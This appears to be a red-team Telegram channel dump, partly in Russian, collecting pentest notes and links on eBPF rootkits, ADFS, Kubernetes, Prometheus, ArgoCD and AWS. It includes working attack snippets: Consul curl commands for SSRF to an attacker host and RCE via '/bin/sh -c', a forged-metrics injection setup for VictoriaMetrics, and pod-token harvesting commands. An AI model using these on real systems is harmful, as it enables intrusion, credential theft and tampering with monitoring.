eBPF
eBPF: A new frontier for malware
Bad-bpf- A collection of eBPF programs demonstrating bad behavior, presented at DEF CON 29
ebpfkit - rootkit powered by eBPF
With Friends Like eBPF, Who Needs Enemies? - Black hat USA 2021 research
eBPF: A new frontier for malware
* What is eBPF?
* Lifetime of an eBPF program
* kprobes, uprobes, and tracepoints
* eXpress Data Path (XDP)
* Traffic Control (TC)
* Prevention
* Detection
Bad-bpf- A collection of eBPF programs demonstrating bad behavior, presented at DEF CON 29
ebpfkit - rootkit powered by eBPF
With Friends Like eBPF, Who Needs Enemies? - Black hat USA 2021 research
Red Canary
eBPF: A new frontier for malware | Red Canary
Extended Berkeley Packet Filter (eBPF) is beginning to transform the Linux malware landscape. Here's what defenders should look out for.
❤3🐳2
Заинтересовала тема с eBPF, поэтому в качестве эксперимента решил сделать вот такой проект https://github.com/cotsom/eBPF-rootkit/
По сокрытию pid есть хорошие статьи с разбором взятого примера
eBPF program creation in practice – PID concealment (Part 1)
eBPF in practice – PID concealment (Part 2)
* Бекдор через отправку парольной фразы в tcp пакете
* Сокрытие pid'а процесса (этот функционал взят из bad-bpf, но загрузчик переписан на Go)
По сокрытию pid есть хорошие статьи с разбором взятого примера
eBPF program creation in practice – PID concealment (Part 1)
eBPF in practice – PID concealment (Part 2)
GitHub
GitHub - cotsom/eBPF-rootkit: eBPF backdoor with PID hiding
eBPF backdoor with PID hiding. Contribute to cotsom/eBPF-rootkit development by creating an account on GitHub.
❤8🐳4
Post-exploiting a compromised etcd – Full control over the kubernetes cluster and its nodes
* Persistence
* Resources hiding
* Bypassing AdmissionControllers
❤7🐳2
Curing
Curing is a POC of a rootkit that uses io_uring to perform different tasks without using any syscalls
Linux io_uring problems - Link
Curing is a POC of a rootkit that uses io_uring to perform different tasks without using any syscalls
* Read files
* Write files
* Create symbolic links
* C2 server communication
Linux io_uring problems - Link
GitHub
GitHub - armosec/curing: io_uring based rootkit
io_uring based rootkit. Contribute to armosec/curing development by creating an account on GitHub.
❤3🐳2
GRPCUI
command-line tool that lets you interact with gRPC servers via a browser.
If the server has reflection enabled, grpcui will automatically detect the available methods
Usefull for
command-line tool that lets you interact with gRPC servers via a browser.
If the server has reflection enabled, grpcui will automatically detect the available methods
#If u have proto
grpcui -proto service.proto -plaintext grpc-address:50051
#If service have reflection
grpcui -plaintext grpc-address:50051
Usefull for
* Testing via burp
* Using sqlmap & the like
* Supports proxying via proxychains
GitHub
GitHub - fullstorydev/grpcui: An interactive web UI for gRPC, along the lines of postman
An interactive web UI for gRPC, along the lines of postman - fullstorydev/grpcui
❤3🐳3
eBPF rootkit reverse
Link
* Introduction to eBPF
* How are eBPF programs built and loaded?
* Reversing eBPF rootkit
Link
ARMO
Reverse Engineering eBPF Programs: A Deep Dive
Explore how eBPF technology works by reverse engineering eBPF-based programs. Learn about its internals, benefits, and applications in modern computing
🐳4❤1
Node Post-Exploitation
After escaping to the worker node, you will have access to all containers located on it.
The noscript can-they.sh will automatically get the tokens of other pods and check if they have the permission you are looking for (instead of you looking 1 by 1):
After escaping to the worker node, you will have access to all containers located on it.
The noscript can-they.sh will automatically get the tokens of other pods and check if they have the permission you are looking for (instead of you looking 1 by 1):
./can-they.sh -i "--list -n default"
./can-they.sh -i "list secrets -n kube-system"// Some code
GitHub
badPods/noscripts/can-they.sh at main · BishopFox/badPods
A collection of manifests that will create pods with elevated privileges. - BishopFox/badPods
🐳4❤3
VictoriaMetrics
Если вы нашли кластер VictoriaMetrics, компоненты которого не закрыты за vmauth (сервис для аутха и проксирования к другим компонентам вики), то имеется возможность не только просматривать все собираемые метрики, но и подделывать их путем пуша своих
1) Поднимаем свой prometheus в конфигурации которого указываем
В контейнере с prometheus добавляем в
2) Поднимаем веб, который будет отдавать поддельные метрики
3) Каждые 10 секунд прометей будет ходить за метриками и отдавать их по пути указанному в
Таким образом можно указать как уже существующий
Если вы нашли кластер VictoriaMetrics, компоненты которого не закрыты за vmauth (сервис для аутха и проксирования к другим компонентам вики), то имеется возможность не только просматривать все собираемые метрики, но и подделывать их путем пуша своих
1) Поднимаем свой prometheus в конфигурации которого указываем
global:
scrape_interval: 10s
scrape_configs:
- job_name: 'redteam'
metrics_path: /metrics
static_configs:
- targets: ['redteam.ru:9100'] # target, который мы хотим подделать
remote_write:
- url: "http://host:8429/api/v1/write" # сервис, принимающий метрики, например vmagent
В контейнере с prometheus добавляем в
/etc/hosts/ запись для redteam.ru, указывающую на наш веб с метриками2) Поднимаем веб, который будет отдавать поддельные метрики
import http.server
import socketserver
PORT = 9100
METRICS = """
# HELP cpu_usage Test metric
# TYPE cpu_usage gauge
cpu_usage{job="redteam"} 0.64
""".encode('utf-8')
class MetricsHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path == '/metrics':
self.send_response(200)
self.send_header("Content-type", "text/plain; version=0.0.4; charset=utf-8")
self.end_headers()
self.wfile.write(METRICS)
else:
self.send_response(404)
self.end_headers()
with socketserver.TCPServer(("", PORT), MetricsHandler) as httpd:
print("serving metrics at port", PORT)
httpd.serve_forever()
3) Каждые 10 секунд прометей будет ходить за метриками и отдавать их по пути указанному в
remote_writeТаким образом можно указать как уже существующий
job_name, так и существующий для него target и внедриться в информацию, которая отобразится в Grafana для определенного instance❤3🐳2
collection of curated tools, guides, and best practices for securing decentralized systems and smart contracts in the blockchain space
* Roadmaps & Learning Paths
* Smart Contract Programming Best Practices
* Audit Reports
* Security Checklists
* CTFs & Challenges
* Exploit Repositories
etc...
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - Raiders0786/web3-security-resources: The Web3 Security Resources Hub is a comprehensive collection of curated tools, guides…
The Web3 Security Resources Hub is a comprehensive collection of curated tools, guides, and best practices for securing decentralized systems and smart contracts in the blockchain space. - Raiders0...
1❤6
ADFS Post-Exploitation
How to access cloud systems outside domain - Introduction to the SAML attack against ADFS
Tools
How to access cloud systems outside domain - Introduction to the SAML attack against ADFS
Tools
* ADFSDump - Dump decryption private keys and other sorts of goodies from AD FS
* ADFSpoof - A python tool to forge AD FS security tokens
Orangecyberdefense
The Golden SAML Attack Against ADFS.
Attackers can determine if there are any ADFS installations and proceed to access these with the intent to extract sensitive information from those hosts.
❤6🐳1
Prometheus pentest
Exposed administration interfaces
Prometheus provides an optional management API which can be enabled via the command line flags
The endpoints are disabled by default, but in a non-secure deployment, an attacker can query the status of these settings from the API endpoint
Targets disclosure
API endpoint
e.g dangerous labels with possible sensitive information disclosure:
Articles:
* Don’t let Prometheus Steal your Fire
* How attackers use exposed Prometheus server to exploit Kubernetes clusters
Exposed administration interfaces
Prometheus provides an optional management API which can be enabled via the command line flags
web.enable-admin-api and web.enable-lifecycle. These endpoints allow deletion of all saved metrics and shutting down of the monitoring server, respectively.The endpoints are disabled by default, but in a non-secure deployment, an attacker can query the status of these settings from the API endpoint
/api/v1/status/flags to check if they have been manually enabled:{
"status": "success",
"data": {
"web.enable-admin-api": "true",
"web.enable-lifecycle": "false",
}
}Targets disclosure
API endpoint
/api/v1/targets exposes services belonging to the infrastructure, including their roles and labels. the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its denoscription, but various cloud platforms may automatically expose sensitive data in these labelse.g dangerous labels with possible sensitive information disclosure:
__meta_gce_metadata_ssh_keys
__meta_gce_metadata_startup_noscript
__meta_gce_metadata_kube_env
_meta_kubernetes_pod_annotation_kubectl_kubernetes_io_last_applied_configuration
Articles:
* Don’t let Prometheus Steal your Fire
* How attackers use exposed Prometheus server to exploit Kubernetes clusters
JFrog
Don’t let Prometheus Steal your Fire
How to deploy & configure Prometheus securely, including authentication and encryption capabilities. Real-world exposures discovered by the JFrog Security Research team
2❤5🐳3
Openstack pentest
Articles
OpenStack from a penetration tester perspective
Part 1
Part 2
Part 3
Tool
openstack-security-tool
Articles
OpenStack from a penetration tester perspective
Part 1
Part 2
Part 3
Tool
openstack-security-tool
Medium
OpenStack from a penetration tester perspective: Part 1
Hello everyone,
❤5🐳3🤯1
ArgoCD - Declarative, GitOps tool for continuous delivery on Kubernetes
Template for deploying pod and code execution within a cluster - Link
CVE-2024-31989
CVE-2025-55190
Hardening
Template for deploying pod and code execution within a cluster - Link
CVE-2024-31989
* Use of Risky or Missing Cryptographic Algorithms in Redis Cache (Summary & PoC)
* Redis or Not – Revealing a Critical Vulnerability in Argo CD Kubernetes Controller
CVE-2025-55190
Argo CD's Project API Token Exposes Repository Credentials
curl -sH "Authorization: Bearer $ARGOCD_API_TOKEN" \
"https://argocd.example.com/api/v1/projects/myProject/detailed"
Hardening
* Six Critical Blindspots While Securing Argo CD
* Securing Multi-Cluster ArgoCD
* Securing Continuous Delivery: Argo CD Threat Detection
GitHub
GitHub - cotsom/argocd-helloapp
Contribute to cotsom/argocd-helloapp development by creating an account on GitHub.
❤4🐳3
Consul
SSRF
Register agent
RCE
Register agent
Agents
Get check output
Unregister agent
Article - Consul by HashiCorp: from Infoleak to RCE
SSRF
Register agent
curl -X PUT -H "Content-Type: application/json" -d '{
"ID": "testservice",
"Name": "testservice",
"Address": "127.0.0.1",
"Port": 80,
"check": {
"HTTP": "http://attackerIp:attackerPort",
"interval": "10s"
}
}' http://consul-host:8500/v1/agent/service/registerRCE
Register agent
curl -X PUT -H "Content-Type: application/json" -d '{
"ID": "testservice",
"Name": "testservice",
"Address": "127.0.0.1",
"Port": 80,
"check": {
"Args": ["/bin/sh", "-c", "id"],
"interval": "10s"
}
}' http://consul-host:8500/v1/agent/service/registerAgents
Get check output
curl http://consul-host:8500/v1/agent/checks | jq
Unregister agent
curl http://consul-host:8500/v1/agent/service/deregister/testservice -X PUT
Article - Consul by HashiCorp: from Infoleak to RCE
Wallarm
🙍♂️Consul by HashiCorp: from Infoleak to RCE
Basically, Consul ensures the coherence of system components and the trust between them.☝️ Consul is at the core of your system.
❤4🐳2
Spring Boot Actuator
Article
Under the Radar: Exploring Spring Boot Actuator Misconfigurations
Recon
Exploitation
Article
Under the Radar: Exploring Spring Boot Actuator Misconfigurations
* What makes Spring Boot Actuator a treasure trove for attackers?
* Common Misconfigurations in Spring Boot Actuator
#1 Exposed HeapDump file
#2 Exposed Actuator Gateway Endpoint leading to RCE
#3 Exposed env endpoint
* How Can Organizations Defend Themselves?
Recon
* /actuator - List of all available actuator endpoints
* /actuator/mappings - All URL mappings controllers and handlers), request → method mappings
* /actuator/beans - Shows registered Spring beans
* /actuator/configprops - Values and sources ConfigurationProperties
Exploitation
* /actuator/heapdump - Exposed HeapDump file
* /actuator/env - Expose details about the runtime environment
* /actuator/httptrace - Leakage of payload structures, internal URLs, possible query data
* /actuator/loggers - Shows current logging levels and (if enabled) allows you to change logger levels at runtime
* /actuator/gateway/routes - Ssrf, can lead to rce (cve-2022-22947)
wiz.io
Exploring Spring Boot Actuator Misconfigurations | Wiz Blog
Misconfigurations in Spring Boot Actuator’s endpoints can leak environment variables, passwords, and API keys, and even lead to remote code execution.
❤3🐳2
AWS pwn
A collection of noscripts for AWS penetration testing. Contains sets of noscripts for
A collection of noscripts for AWS penetration testing. Contains sets of noscripts for
* Reconnaissance - Things to do with pre-compromise information gathering.
* Exploitation - Things that will help you gain a foothold in an account.
* Stealth - Things that might help you stay hidden after compromising an account.
* Exploration - Things to help you understand what you've pwned.
* Elevation - Things to help you move around an account and gather different levels of access.
* Persistence - Things to help maintain your access to an acccount.
* Exfiltration - Things to help you extract and move data around in AWSy ways.
GitHub
GitHub - dagrz/aws_pwn: A collection of AWS penetration testing junk
A collection of AWS penetration testing junk. Contribute to dagrz/aws_pwn development by creating an account on GitHub.
❤2🐳2